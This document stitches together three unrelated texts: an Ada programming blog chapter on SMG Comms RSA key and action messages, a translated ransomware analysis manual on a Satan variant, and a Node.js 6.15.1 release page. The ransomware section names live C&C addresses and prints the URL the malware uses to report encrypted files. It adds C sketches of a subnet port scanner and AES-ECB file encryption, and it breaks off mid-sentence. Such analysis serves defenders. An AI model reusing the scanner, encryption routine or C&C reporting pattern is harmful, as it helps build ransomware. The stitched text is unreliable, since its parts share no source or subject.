
SMG Comms Chapter 10: Actions and RSA Keys


~ This is a work in progress towards an Ada implementation of Eulora's communication protocol. Start with Chapter 1. ~

Eulora's communication protocol uses RSA keys only for new players who don't yet have a set of Serpent keys agreed on for communication with the server. The main reason for not using RSA for all client-server communications is simply that RSA is essentially too expensive for that. As it happens, it turns out that republican RSA with its fixed-size 256 octet (2048 bit) public exponent is anyway too expensive even for this reduced role - communicating all those octets to the server inside an RSA package takes quite a lot of space. As a result, Eulora will use a smaller e, of only 8 octets (64 bits), that fits neatly into the message structure for requesting a new account in the game (5.1 RSA key set). This means of course that I'll also have to patch EuCrypt to allow an arbitrary size of the public exponent in order to have a way to actually generate such RSA key pairs, but that will have to be the next step and another post on its own. For now, at the level of read/write from/to SMG Comms messages, there's no direct concern with the crypto lib itself: the e will simply be 8 octets long at its specified place in the message and that is that.

Since the RSA Key Set message also includes some client information (protocol version and subversion, client hash, preferred padding), I've first defined a new data structure (in data_structs.ads) to hold all this in one place:

type Player_RSA is record
  -- communication protocol Version number
  Proto_V     : Interfaces.Unsigned_8;
  -- communication protocol Subversion number
  Proto_Subv  : Interfaces.Unsigned_16;
  -- Keccak hash of client binary
  Client_Hash : Raw_Types.Octets_8;
  -- public exponent (e) of RSA key (64 bits precisely)
  -- nb: this is protocol-specific e, aka shorter than TMSR e...
  e           : Raw_Types.Octets_8;
  -- public modulus (n) of RSA key (490 bits precisely)
  n           : Raw_Types.RSA_len;
  -- preferred padding; magic value 0x13370000 means random padding
  Padding     : Raw_Types.Octets_8;
end record;

The choice to have the new structure shown above comes mainly from the fact that all the information in there is on one hand related (as it belongs to and describes one specific player at any given time) and on the other hand of no direct concern to this part of code. In other words, this part of the code reads and writes that information together but it has no idea regarding its use (nor should it have). It's for this same reason also that I preferred to keep e and n simply as members like any others of the Player_RSA record rather than having them stored already inside a RSA_pkey structure. For one thing there's no need for the read/write part to even know about the RSA_pkey structure (which is defined in rsa_oaep.ads where it belongs). And for another thing, having e and n as members of the record just like any others keeps the code both clear and easy to change in principle at a later time. Basically the read/write do as little as they can get away with - there is even no attempt to interpret e for instance as a number although its reduced size makes that possible here. Note that the protocol version and subversion are however interpreted as integers but in their case there's no point to keep them as raw octets. On the other hand, the choice of padding is kept as raw octets precisely because this is how it will be needed and used anyway.

Choosing the correct place for storing the padding option also gave me a bit to think about because it's not fully clear to me at this stage exactly where the padding belongs. Strictly speaking, padding is entirely the job of this level so there shouldn't normally be any leaking outside/upwards of anything to do with it. However, having the ability to choose types of padding means that the protocol itself effectively pushes this particular aspect upwards since it's the user ultimately who makes this choice. As a result, I decided to keep the mechanics of padding local (i.e. actual padding of messages + the magic value for requesting random padding + the interpretation of a padding parameter) while providing this Padding value in the Player_RSA record and otherwise refactoring all the Write procedures to require a Padding parameter indicating the desired choice of padding for that write. Moreover, to have this padding stuff in one single place, I also extracted the writing of counter+padding into its own procedure and then refactored all the Write procedures to call this one (since ALL messages always have at the end precisely a counter + padding). The main benefit to this is that it reduces the chances of making an error in one of the multiple places where otherwise one has to write the counter and then check the requested padding and then pad (if needed) accordingly. Other than this benefit, there isn't necessarily a big reduction in number of code lines nor really much an increase in clarity of the code since there is another procedure call to follow in there. Nevertheless, the alternative is worse: having copy-pasted same stuff in every write procedure and having to change all of it if anything changes. So here's the new Write_End procedure which is private to the Messages package since this is just a helper for all the other Write procedures:

-- Writes Counter and padding (rng or otherwise) into Msg starting from Pos.
procedure Write_End( Msg     : in out Raw_Types.Octets;
                     Pos     : in out Natural;
                     Counter : in Interfaces.Unsigned_16;
                     Padding : in Raw_Types.Octets_8) is
begin
  -- check that there is space for Counter at the very least
  if Pos > Msg'Last - 1 then
    raise Invalid_Msg;
  end if;
  -- write counter
  Write_U16( Msg, Pos, Counter );
  -- pad to the end of the message
  if Pos <= Msg'Last then
    if Padding = RNG_PAD then
      RNG.Get_Octets( Msg( Pos..Msg'Last ) );
    else
      -- repeat the Padding value itself
      for I in Pos..Msg'Last loop
        Msg(I) := Padding( Padding'First + (I - Pos) mod Padding'Length );
      end loop;
    end if;
    -- either rng or fixed, update Pos though
    Pos := Msg'Last + 1;
  end if;
end Write_End;

After the above changes, the read/write procedures for RSA key set from/to RSA messages are quite straightforward to write:

procedure Write_RKeys_RMsg( K       : in Player_RSA;
                            Counter : in Interfaces.Unsigned_16;
                            Pad     : in Raw_Types.Octets_8;
                            Msg     : out Raw_Types.RSA_Msg) is
  Pos : Natural := Msg'First + 1;
begin
  -- write correct message type
  Msg( Msg'First ) := RKeys_R_Type;
  -- write protocol version and subversion
  Msg( Pos ) := K.Proto_V;
  Pos := Pos + 1;
  Write_U16( Msg, Pos, K.Proto_Subv );
  -- write keccak hash of client binary
  Msg( Pos..Pos + K.Client_Hash'Length-1 ) := K.Client_Hash;
  Pos := Pos + K.Client_Hash'Length;
  -- write e of RSA key
  Msg( Pos..Pos + K.e'Length - 1 ) := K.e;
  Pos := Pos + K.e'Length;
  -- write n of RSA key
  Msg( Pos..Pos + K.n'Length - 1 ) := K.n;
  Pos := Pos + K.n'Length;
  -- write preferred padding
  Msg( Pos..Pos + K.Padding'Length - 1 ) := K.Padding;
  Pos := Pos + K.Padding'Length;
  -- write counter + padding
  Write_End( Msg, Pos, Counter, Pad );
end Write_RKeys_RMsg;

-- Reads a RSA Keyset (Player_RSA structures) from the given RSA Message.
-- Opposite of Write_RKeys_RMsg above
procedure Read_RKeys_RMsg( Msg     : in Raw_Types.RSA_Msg;
                           Counter : out Interfaces.Unsigned_16;
                           K       : out Player_RSA) is
  Pos : Natural := Msg'First + 1;
begin
  -- check type id and raise exception if incorrect
  if Msg(Msg'First) /= RKeys_R_Type then
    raise Invalid_Msg;
  end if;
  -- read protocol version and subversion
  K.Proto_V := Msg( Pos );
  Pos := Pos + 1;
  Read_U16( Msg, Pos, K.Proto_Subv );
  -- read Keccak hash of client binary
  K.Client_Hash := Msg( Pos..Pos+K.Client_Hash'Length - 1 );
  Pos := Pos + K.Client_Hash'Length;
  -- read e
  K.e := Msg( Pos .. Pos + K.e'Length - 1 );
  Pos := Pos + K.e'Length;
  -- read n
  K.n := Msg( Pos .. Pos + K.n'Length - 1 );
  Pos := Pos + K.n'Length;
  -- read choice of padding
  K.Padding := Msg( Pos .. Pos+K.Padding'Length - 1 );
  Pos := Pos + K.Padding'Length;
  -- read message counter
  Read_U16( Msg, Pos, Counter );
  -- the rest is message padding, so ignore it
end Read_RKeys_RMsg;

As usual, I also wrote the tests for all the new procedures, including the private Write_End. However, the testing package as it was could not directly call this private procedure from Messages. My solution to this is to change the declaration of the testing package so that it is effectively derived from Messages - at the end of the day it makes sense that the tester simply needs to get to all the private bits and pieces. This change makes however for a lot of noise in the .vpatch but that's how it is. The new test procedure for the counter+padding is - quite as usual - longer than the code it tests:

procedure Test_Padding is
  Msg     : Raw_Types.Serpent_Msg := (others => 12);
  Old     : Raw_Types.Serpent_Msg := Msg;
  Pos     : Natural := 16;
  NewPos  : Natural := Pos;
  Counter : Interfaces.Unsigned_16;
  U16     : Interfaces.Unsigned_16;
  O2      : Raw_Types.Octets_2;
  Pad     : Raw_Types.Octets_8;
  Pass    : Boolean;
begin
  -- get random counter
  RNG.Get_Octets( O2 );
  Counter := Raw_Types.Cast( O2 );
  -- test with random padding
  Pad := RNG_PAD;
  Write_End( Msg, NewPos, Counter, Pad );
  -- check NewPos and counter
  Pass := True;
  if NewPos /= Msg'Last + 1 then
    Put_Line("FAIL: incorrect Pos value after Write_End with rng.");
    Pass := False;
  end if;
  Read_U16(Msg, Pos, U16);
  if U16 /= Counter then
    Put_Line("FAIL: incorrect Counter by Write_End with rng.");
    Pass := False;
  end if;
  -- check that the padding is at least different...
  if Msg(Pos..Msg'Last) = Old(Pos..Old'Last) or
     Msg(Pos..Pos+Pad'Length-1) = Pad then
    Put_Line("FAIL: no padding written by Write_End with rng.");
    Pass := False;
  end if;
  if Pass then
    Put_Line("PASS: Write_End with rng.");
  end if;
  -- prepare for the next test
  Pass := True;
  Pos := Pos - 2;
  NewPos := Pos;
  Msg := Old;
  -- get random padding
  RNG.Get_Octets( Pad );
  -- write with fixed padding and check
  Write_End( Msg, NewPos, Counter, Pad );
  Pass := True;
  if NewPos = Msg'Last + 1 then
    -- check counter + padding
    Read_U16( Msg, Pos, U16 );
    if U16 /= Counter then
      Put_Line("FAIL: Counter was not written by Write_End.");
      Pass := False;
    end if;
    for I in Pos..Msg'Last loop
      if Msg( I ) /= Pad( Pad'First + (I - Pos) mod Pad'Length ) then
        Put_Line("FAIL: Msg(" & Natural'Image(I) & ")=" &
                 Unsigned_8'Image(Msg(I)) & " /= Pad(" &
                 Natural'Image(Pad'First+(I-Pos) mod Pad'Length) &
                 ") which is " &
                 Unsigned_8'Image(Pad(Pad'First+(I-Pos) mod Pad'Length)));
        Pass := False;
      end if;
    end loop;
  else
    Put_Line("FAIL: Pos is wrong after call to Write_End.");
    Pass := False;
  end if;
  if Pass then
    Put_Line("PASS: test for Write_End with fixed padding.");
  end if;
end Test_Padding;

With the above read/write of a RSA key set, all the RSA messages specified in the protocol are provided. Of the Serpent messages, those not yet implemented are the Client Action, World Bulletin, Object Request and Object Info. All of those still require some details to be filled in, but for the moment I went ahead and implemented read/write for Client Action based on a text representation of the action itself (i.e. precisely as specified in section 4.5 of the protocol, although the action can be/is in principle a fully specified structure by itself, as described in section 7 of the specification). At this stage I'm not yet sure whether to provide another layer of read/write for that action text or whether to attempt to read/write directly the Action structures. So this will have to wait and, as details become clearer, the code will get changed/added to, no big deal. Anyway, the Write_Action and Read_Action for now:

-- writes the action (octets+length) into the specified Serpent message
procedure Write_Action( A       : in Raw_Types.Text_Octets;
                        Counter : in Interfaces.Unsigned_16;
                        Pad     : in Raw_Types.Octets_8;
                        Msg     : out Raw_Types.Serpent_Msg) is
  Pos    : Natural := Msg'First + 1;
  MaxPos : Natural := Msg'Last - 1; --2 octets reserved for counter at end
  U16    : Interfaces.Unsigned_16;
begin
  -- check whether given action FITS into a Serpent message
  if Pos + 2 + A.Len > MaxPos then
    raise Invalid_Msg;
  end if;
  -- write correct type ID
  Msg( Msg'First ) := Client_Action_S_Type;
  -- write action's TOTAL length
  U16 := Interfaces.Unsigned_16(A.Len + 2);
  Write_U16( Msg, Pos, U16 );
  -- write the action itself
  Msg( Pos..Pos+A.Len-1 ) := A.Content;
  Pos := Pos + A.Len;
  -- write counter + padding
  Write_End( Msg, Pos, Counter, Pad );
end Write_Action;

-- reads a client action as octets+length from the given Serpent message
procedure Read_Action( Msg     : in Raw_Types.Serpent_Msg;
                       Counter : out Interfaces.Unsigned_16;
                       A       : out Raw_Types.Text_Octets) is
  Pos : Natural := Msg'First + 1;
  U16 : Interfaces.Unsigned_16;
begin
  -- read and check message type ID
  if Msg( Msg'First ) /= Client_Action_S_Type then
    raise Invalid_Msg;
  end if;
  -- read size of action (content + 2 octets the size itself)
  Read_U16( Msg, Pos, U16 );
  -- check size
  if U16 < 3 or Pos + Natural(U16) - 2 > Msg'Last - 1 then
    raise Invalid_Msg;
  else
    U16 := U16 - 2; --size of content only
  end if;
  -- create action, read it from message + assign to output variable
  declare
    Act : Raw_Types.Text_Octets( Raw_Types.Text_Len( U16 ) );
  begin
    Act.Content := Msg( Pos..Pos+Act.Len-1 );
    Pos := Pos + Act.Len;
    A := Act;
  end;
  -- read counter
  Read_U16( Msg, Pos, Counter );
end Read_Action;

As previously with the components of a RSA key, I chose to keep the "action" as raw octets rather than "text" aka String. This can be easily changed later if needed but for now I fail to see any concrete benefit in doing the conversion to and from String. The new Text_Octets type is defined in Raw_Types and I moved there the definition of Text_Len (previously in Messages) as well since it's a better place for it:

-- length of a text field (i.e. 16 bits, strictly > 0)
subtype Text_Len is Positive range 1..2**16-1;

-- "text" type has a 2-byte header with total length
-- Len here is length of actual content ONLY (i.e. it needs + 2 for total)
type Text_Octets( Len: Text_Len := 1 ) is record
  -- actual octets making up the "text"
  Content: Octets( 1..Len ) := (others => 0);
end record;

There is of course new testing code for the read/write action procedures as well:

procedure Serialize_Action is
  O2      : Raw_Types.Octets_2;
  U16     : Interfaces.Unsigned_16;
  Len     : Raw_Types.Text_Len;
  Counter : Interfaces.Unsigned_16;
begin
  Put_Line("Generating a random action for testing.");
  -- generate random counter
  RNG.Get_Octets( O2 );
  Counter := Raw_Types.Cast( O2 );
  -- generate action length
  RNG.Get_Octets( O2 );
  U16 := Raw_Types.Cast( O2 );
  if U16 < 1 then
    U16 := 1;
  else
    if U16 + 5 > Raw_Types.Serpent_Msg'Length then
      U16 := Raw_Types.Serpent_Msg'Length - 5;
    end if;
  end if;
  Len := Raw_Types.Text_Len( U16 );
  declare
    A     : Raw_Types.Text_Octets( Len );
    B     : Raw_Types.Text_Octets;
    Msg   : Raw_Types.Serpent_Msg;
    ReadC : Interfaces.Unsigned_16;
  begin
    RNG.Get_Octets( A.Content );
    begin
      Write_Action( A, Counter, RNG_PAD, Msg );
      Read_Action( Msg, ReadC, B );
      if B /= A then
        Put_Line("FAIL: read/write of Action.");
      else
        Put_Line("PASS: read/write of Action.");
      end if;
    exception
      when Invalid_Msg =>
        if Len + 5 > Raw_Types.Serpent_Msg'Length then
          Put_Line("PASS: exception correctly raised for Action too long");
        else
          Put_Line("FAIL: exception INCORRECTLY raised at action r/w!");
        end if;
    end;
  end;
end Serialize_Action;

The (rather lengthy) .vpatch for all the above and my signature for it can be found on my Reference Code Shelf as usual or through these links:

smg_comms_actions_rsa.vpatch smg_comms_actions_rsa.vpatch.diana_coman.sig

The next step now is to patch the rsa/oaep part of SMG Comms to use the 8-octets public exponent and then to get back to EuCrypt and patch it to allow arbitrary size public exponent - so much for fixed size. In other words, it's a very good opportunity to re-read and review EuCrypt!


Satan Variant Analysis and Response Manual


At the end of November 2018, multiple financial customers in China were infected with a cross-platform ransomware virus. The virus is a variant of the worm FT.exe described below; it drops a Monero mining program and ransomware. The ransomware spreads worm-like on both Linux and Windows, encrypts local files with the .lucky suffix, and drops the ransom note file _How_To_Decrypt_My_File_.

The attackers' C&C servers are still alive and large-scale infection cannot be ruled out, so affected users should pay attention and take protective measures promptly; the related IoC information can be found in the appendix.

■ Severity: High. A new Satan variant has appeared with a wide infection range; it can infect both Linux and Windows hosts.

■ TAG: Satan, worm, file encryption

Table of Contents

Satan variant on Windows
conn module attack code for each vulnerability
JBoss deserialization vulnerability exploitation
JBoss default configuration vulnerability (CVE-2010-0738)
Tomcat arbitrary file upload vulnerability (CVE-2017-12615)
Tomcat web management console weak password brute forcing
WebLogic arbitrary file upload vulnerability (CVE-2018-2894)
WebLogic WLS component vulnerability (CVE-2017-10271)
Windows SMB remote code execution vulnerability MS17-010
Apache Struts2 remote code execution vulnerability S2-045
Apache Struts2 remote code execution vulnerability S2-057
Spring Data Commons remote code execution vulnerability (CVE-2018-1273)
Download the full Satan variant analysis and response manual

I. Background

In early November 2018, NSFOCUS found that some financial customers were infected with FT.exe, a worm sample that runs on both Linux and Windows. It uses propagation channels similar to the Satan ransomware and spreads by exploiting multiple application vulnerabilities. After entering a system, the worm shows no obviously destructive behavior and only propagates itself.

At the end of November 2018, multiple financial customers in China were infected with a cross-platform ransomware virus. The virus is a variant of the worm FT.exe; it drops a Monero mining program and ransomware. The ransomware spreads worm-like on both Linux and Windows, encrypts local files with the .lucky suffix, and drops the ransom note file _How_To_Decrypt_My_File_.

The attackers' C&C servers are still alive and large-scale infection cannot be ruled out, so affected users should pay attention and take protective measures promptly; the related IoC information can be found in the appendix.

II. Virus Analysis

2.1 Propagation Methods

The Satan virus family propagates through the 10 common vulnerabilities listed below. On Linux, the Satan variant currently scans for vulnerabilities by traversing internal IP ranges combined with a port list; on Windows it scans using an IP list combined with a port list.

1. JBoss deserialization vulnerability

2. JBoss default configuration vulnerability (CVE-2010-0738)

3. Tomcat arbitrary file upload vulnerability (CVE-2017-12615)

4. Tomcat web management console weak password brute forcing

5. WebLogic arbitrary file upload vulnerability (CVE-2018-2894)

6. WebLogic WLS component vulnerability (CVE-2017-10271)

7. Windows SMB remote code execution vulnerability MS17-010

8. Apache Struts2 remote code execution vulnerability S2-045

9. Apache Struts2 remote code execution vulnerability S2-057

10. Spring Data Commons remote code execution vulnerability (CVE-2018-1273)

2.2 Scope of Impact

Linux and Windows systems

2.3 Recent Version Changes

V1.10

A cross-platform worm for Linux and Windows; after entering a system it shows no obviously destructive behavior and only propagates itself.

V1.13

Added a ransomware module that encrypts local files with the .lucky suffix and drops the ransom note file _How_To_Decrypt_My_File_.

2.4 Virus Behavior

Since this Satan variant spreads across both Linux and Windows, its behavior needs to be analyzed separately for each platform.

Satan variant on Linux

The Satan variant consists of 4 module programs: ft32, conn32, cry32 and mn32. All are 32-bit Linux programs, and each module also has a corresponding 64-bit version whose file name ends in 64.

ft module

ft32 is the main module of the Satan variant; it downloads the other module programs and executes them. After starting, the program checks whether its own file name is .loop; if not, it copies itself to the current directory, terminates the ft32 process and starts the .loop program to carry out the subsequent behavior.

Once started under the .loop file name, it first downloads the three files mn32/64, conn32/64 and cry32/64 and saves them locally as .data, .conn and .crypt respectively. The corresponding sample code logic is shown below.


After downloading the other module programs, it enters the sub_804A52A function for the subsequent operations.

Step one: it tries to contact the C&C server by making HTTP requests to 4 IP addresses; any address that responds is saved as the communication address for later use. The code makes trial HTTP requests to 111.90.158.225, 107.179.65.195 and 23.247.83.135 in turn; if a string is obtained via the HTTP request, that IP address is saved as the C&C communication address.

Step two: in the sub_8049719 function, three methods are used to achieve persistence at startup.

1. It modifies the scheduled task file to run at startup.

2. It creates the /etc/rc6.d/S20loop service to run at startup.

3. It modifies the rc.local file to run at startup.

Step three: it constructs the communication data; the request used is shown below.

conn module

This module is the exploit module of the Lucky sample; it is packed with UPX, and after unpacking it is about 4000 KB in size. The Lucky sample's exploit module reuses code from the Satan virus and carries out the same types of attacks.

After running, this module first obtains the addresses of its own network segment and then loads a port list of 230 ports (see Appendix C for the port list). It scans ports by combining traversal of its own network segment with the port list, which produces the network behavior observed during analysis.
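To make the scanning behavior concrete, here is a minimal C sketch of the same idea: walk a /24 network and attempt a plain TCP connect() against each port in a list. The network base and the (shortened) port list are placeholder assumptions for illustration, not values recovered from the sample, and timeouts and parallelism are deliberately omitted.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>

/* Illustrative only: probe every host of an assumed local /24 network
 * against a tiny stand-in port list with blocking TCP connect() calls. */
int main(void)
{
    const char *base = "192.168.1.";                   /* placeholder network base   */
    const int ports[] = { 80, 443, 7001, 8080, 8443 }; /* placeholder port list      */
    char ip[32];

    for (int host = 1; host <= 254; host++) {
        snprintf(ip, sizeof ip, "%s%d", base, host);
        for (size_t p = 0; p < sizeof ports / sizeof ports[0]; p++) {
            int s = socket(AF_INET, SOCK_STREAM, 0);
            struct sockaddr_in addr;
            memset(&addr, 0, sizeof addr);
            addr.sin_family = AF_INET;
            addr.sin_port   = htons(ports[p]);
            inet_pton(AF_INET, ip, &addr.sin_addr);
            if (connect(s, (struct sockaddr *)&addr, sizeof addr) == 0)
                printf("open: %s:%d\n", ip, ports[p]);  /* candidate for exploitation */
            close(s);
        }
    }
    return 0;
}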


If a usable IP address and port are found, it attempts to trigger a vulnerability. The vulnerability types attempted include the following 10:

1. JBoss deserialization vulnerabilities (CVE-2013-4810, CVE-2017-12149)

2. JBoss default configuration vulnerability (CVE-2010-0738)

3. Tomcat arbitrary file upload vulnerability (CVE-2017-12615)

4. Tomcat web management console weak password brute forcing

5. WebLogic arbitrary file upload vulnerability (CVE-2018-2894)

6. WebLogic WLS component vulnerability (CVE-2017-10271)

7. Windows SMB remote code execution vulnerability MS17-010

8. Apache Struts2 remote code execution vulnerability S2-045

9. Apache Struts2 remote code execution vulnerability S2-057

10. Spring Data Commons remote code execution vulnerability (CVE-2018-1273)

The figure shows the JSP file uploaded when exploiting the Tomcat upload vulnerability.

Besides the scanning attacks on web middleware described above, this module also tries to brute force Linux host passwords. The following 4 users are targeted:

The weak password list used is as follows:

cry module

This module encrypts local files. During encryption the cry module uses a whitelist; files located under the following 7 paths are not encrypted.

During encryption, the parameters of each encrypted file are uploaded to the attacker's server at 111.90.158.225. The request sent is shown below, where "xxx" is data the sample assembles dynamically at runtime.

111.90.158.225/cyt.php?code=xxx&file=xxx&size=xxx&sys=linux&VRESION=4.3&status=xxx

mn module

This module is the open-source xmrig miner, whose code is published at https://github.com/xmrig/xmrig. Its mining address configuration is as follows:

Satan variant on Windows

fast.exe

fast.exe is the main module of the Satan variant on Windows; it mainly downloads conn.exe and srv.exe and starts them with the ShellExecuteA function, with srv.exe started using the install parameter.

cpt.exe

cpt.exe is mainly responsible for the encryption functionality.

The list of file extensions selected for encryption is as follows:

bak,sql,mdf,ldf,myd,myi,dmp,xls,xlsx,docx,pptx,eps,txt,ppt,csv,rtf,pdf,db,vdi,vmdk,vmx,pem,pfx,cer,psd

To keep the system running normally, the sample does not encrypt files in the following directories:

Windows directories: python2, python3, boot, i386, 360safe, intel, dvd maker, recycle, jdk, lib, libs, microsoft, 360rec, 360sec, 360sand

Linux directories: /bin/, /boot/, /sbin/, /tmp/, /dev/, /etc/, /lib/, /lib64/, /misc/, /net/, /proc/, /selinux/, /srv/, /sys/, /usr/lib/, /usr/include/, /usr/bin/, /usr/etc/, /usr/games/, /usr/lib64/, /usr/libexec/, /usr/sbin/, /usr/share/, /usr/src/, /usr/tmp/, /var/account/, /var/cache/, /var/crash/, /var/empty/, /var/games/, /var/gdm/, /var/lib/, /var/lock/, /var/log/, /var/nis/, /var/preserve/, /var/spool/, /var/tmp/, /var/yp/, /var/run/
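As an illustration of how such an exclusion check typically works, here is a minimal C sketch that skips any path falling under an excluded directory prefix; the shortened list below is a stand-in for the full Linux list above, not code extracted from the sample.

#include <stdio.h>
#include <string.h>

/* Illustrative only: decide whether a path falls under one of the excluded
 * directories and should therefore be skipped during encryption. */
static const char *skip_dirs[] = { "/bin/", "/boot/", "/etc/", "/usr/lib/" };

int should_skip(const char *path)
{
    for (size_t i = 0; i < sizeof skip_dirs / sizeof skip_dirs[0]; i++)
        if (strncmp(path, skip_dirs[i], strlen(skip_dirs[i])) == 0)
            return 1;   /* path is inside an excluded directory */
    return 0;
}

int main(void)
{
    printf("%d\n", should_skip("/etc/passwd"));    /* prints 1: skipped    */
    printf("%d\n", should_skip("/home/user/a"));   /* prints 0: encrypted  */
    return 0;
}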

Before starting encryption, the sample notifies the C&C server that encryption has begun, setting the status parameter to begin.

The notification traffic is as follows:

After it runs, the sample generates a random string and takes the first 32 bytes as the key; using the AES_ECB algorithm, it reads 16 bytes at a time and encrypts each file.
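For reference, here is a minimal C sketch (using OpenSSL's legacy AES API) of encrypting a file 16 bytes at a time with a 32-byte key in ECB mode, as described above. The key value, the zero-padding of the final block and the file names are illustrative assumptions, not the sample's actual implementation.

#include <stdio.h>
#include <string.h>
#include <openssl/aes.h>

/* Minimal sketch: copy a file to a new file, encrypting it with AES-256-ECB,
 * 16 bytes per block. Compile with -lcrypto. */
int encrypt_file_ecb(const char *in_path, const char *out_path,
                     const unsigned char key32[32])
{
    AES_KEY key;
    unsigned char in[16], out[16];
    size_t n;
    FILE *fi = fopen(in_path, "rb");
    FILE *fo = fopen(out_path, "wb");
    if (!fi || !fo) {
        if (fi) fclose(fi);
        if (fo) fclose(fo);
        return -1;
    }

    AES_set_encrypt_key(key32, 256, &key);        /* 32-byte key -> AES-256      */
    while ((n = fread(in, 1, 16, fi)) > 0) {
        if (n < 16)                                /* zero-pad the last block     */
            memset(in + n, 0, 16 - n);
        AES_ecb_encrypt(in, out, &key, AES_ENCRYPT);
        fwrite(out, 1, 16, fo);
    }
    fclose(fi);
    fclose(fo);
    return 0;
}

int main(void)
{
    /* placeholder 32-byte key; the sample derives its key from a random string */
    unsigned char key[32] = "0123456789abcdef0123456789abcdef";
    return encrypt_file_ecb("test.txt", "test.txt.lucky", key);
}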


All files are encrypted with the same key. After a file is successfully encrypted, the sample renames the original file to the form [nmare@cock.li]filename.tRD53kRxhtrAl5ss.lucky. Once all encryption work is finished, it tells the C&C server that encryption is complete, setting the status parameter to done.

When all the files

Node v6.15.1 (LTS)


This is a patch release to address a bad backport of the fix for "Slowloris HTTP Denial of Service" (CVE-2018-12122). Node.js 6.15.0 misapplies the headers timeout to an entire keep-alive HTTP session, resulting in prematurely disconnected sockets.

Users of Node.js 6.x LTS 'Boron' should upgrade to 6.15.1 as soon as possible.

Commits

[ 5d9005c359 ] - http: fix backport of Slowloris headers (Matteo Collina) #24796

Windows 32-bit Installer: https://nodejs.org/dist/v6.15.1/node-v6.15.1-x86.msi

Windows 64-bit Installer: https://nodejs.org/dist/v6.15.1/node-v6.15.1-x64.msi

Windows 32-bit Binary: https://nodejs.org/dist/v6.15.1/win-x86/node.exe

Windows 64-bit Binary: https://nodejs.org/dist/v6.15.1/win-x64/node.exe

macOS 64-bit Installer: https://nodejs.org/dist/v6.15.1/node-v6.15.1.pkg

macOS 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-darwin-x64.tar.gz

Linux 32-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-x86.tar.xz

Linux 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-x64.tar.xz

Linux PPC LE 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-ppc64le.tar.xz

Linux PPC BE 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-ppc64.tar.xz

Linux s390x 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-s390x.tar.xz

AIX 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-aix-ppc64.tar.gz

SunOS 32-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-sunos-x86.tar.xz

SunOS 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-sunos-x64.tar.xz

ARMv6 32-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-armv6l.tar.xz

ARMv7 32-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-armv7l.tar.xz

ARMv8 64-bit Binary: https://nodejs.org/dist/v6.15.1/node-v6.15.1-linux-arm64.tar.xz

Source Code: https://nodejs.org/dist/v6.15.1/node-v6.15.1.tar.gz

Other release files: https://nodejs.org/dist/v6.15.1/

Documentation: https://nodejs.org/docs/v6.15.1/api/

SHASUMS

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

dcabcb43de205f1946f9cb415c728a5d542345117c9a61a506c587b4c7c01b52 node-v6.15.1-aix-ppc64.tar.gz
febce60c9ca2d9798483b005e287389ec643edd58a749d66bafc0d02d497061f node-v6.15.1-darwin-x64.tar.gz
82d9f7477a72742a7aba679ecc74f4de7f6c0b6236a423f62e19be82442f4fdc node-v6.15.1-darwin-x64.tar.xz
fbf18a7e7474f4a8de2a45233d9229a558a2149a509b183d6d9a1d2753eab69b node-v6.15.1-headers.tar.gz
929f7be7d51dd73cf75609c6e178fccb0ce7f8784dbf64c0ebfc1155f7226cd1 node-v6.15.1-headers.tar.xz
436bbf8467418afb8d505cbaf9203dba27103020f8289975d383c3e97872428d node-v6.15.1-linux-arm64.tar.gz
8a5d9d08af4bffee4ff2023370a050a921f14ca38d2e43b695932e1550dd0e4a node-v6.15.1-linux-arm64.tar.xz
acc3d7a994e928e027b4738469e63292dd2da8e8bf42f3a3cec9c459eab15252 node-v6.15.1-linux-armv6l.tar.gz
d32eabb3169b536fb2f83f7cda314305e23f0017eb550e5efb5314a879763d02 node-v6.15.1-linux-armv6l.tar.xz
c794d8a3f1d9ec9bbd57671a57583a3dca7f4f099d9c06b5ab7bc7c075c522bd node-v6.15.1-linux-armv7l.tar.gz
86450c1c3679d855b578791b7702c3d805df182fa63317ab92ac427a340148f6 node-v6.15.1-linux-armv7l.tar.xz
70d63aa325b8ee7a121fa878e5abd5fcce603ba4172d7fc0e667fe39b00ae291 node-v6.15.1-linux-ppc64le.tar.gz
10517e871477b173e4e6f9818013b45b53fb6c39e330561b8d9b5e85e7983029 node-v6.15.1-linux-ppc64le.tar.xz
1b0fffb2e9fff929f8f41ed29b6585e12fd230854da2196d48cc49f0579b6227 node-v6.15.1-linux-ppc64.tar.gz
49bdca00e1f76e7fe0d7147a46382aaee0752cf9f9894180e0dc4657a862dc4e node-v6.15.1-linux-ppc64.tar.xz
a22db341ffc22101d2392eed9212a1bc05d94d11b621fecd321fe8b57b139c87 node-v6.15.1-linux-s390x.tar.gz
9783db5be4652ec97e82e5c02b44776bc4f7405e741c9f4822590f1fdd22085d node-v6.15.1-linux-s390x.tar.xz
aa8ef47382853d7124110203c3773515cff00737f1cd7bce98bd388603141c6d node-v6.15.1-linux-x64.tar.gz
bc39a08ef41712d974c87f0a323b13d2c3f2320cf4f1683f0e6293fc7179a872 node-v6.15.1-linux-x64.tar.xz
8790767b3f6bcd99df81d3e486482799ebeba87bc5352b5b3b7623caf51900df node-v6.15.1-linux-x86.tar.gz
659576fd9c2de75b4ccc210a815495ed3be0aa979ce2e6f9e12a25dd3c415029 node-v6.15.1-linux-x86.tar.xz
4e3675e929506a2ec05f232cb220995ac2c31f7e8c6e2d6b46dabffaedc51075 node-v6.15.1.pkg
0aaeeb4514d7859425b72ceb252451fa8794126b3b6b153a63549a6ae377d147 node-v6.15.1-sunos-x64.tar.gz
c40c4478475b3f93f9e588506d40ed57e8807dae569f3f9ddc294058a0ab371a node-v6.15.1-sunos-x64.tar.xz
6ae54f400b126ff535c31d1a7f8d795344977e83e334cdfe610c85bad85a88cc node-v6.15.1-sunos-x86.tar.gz
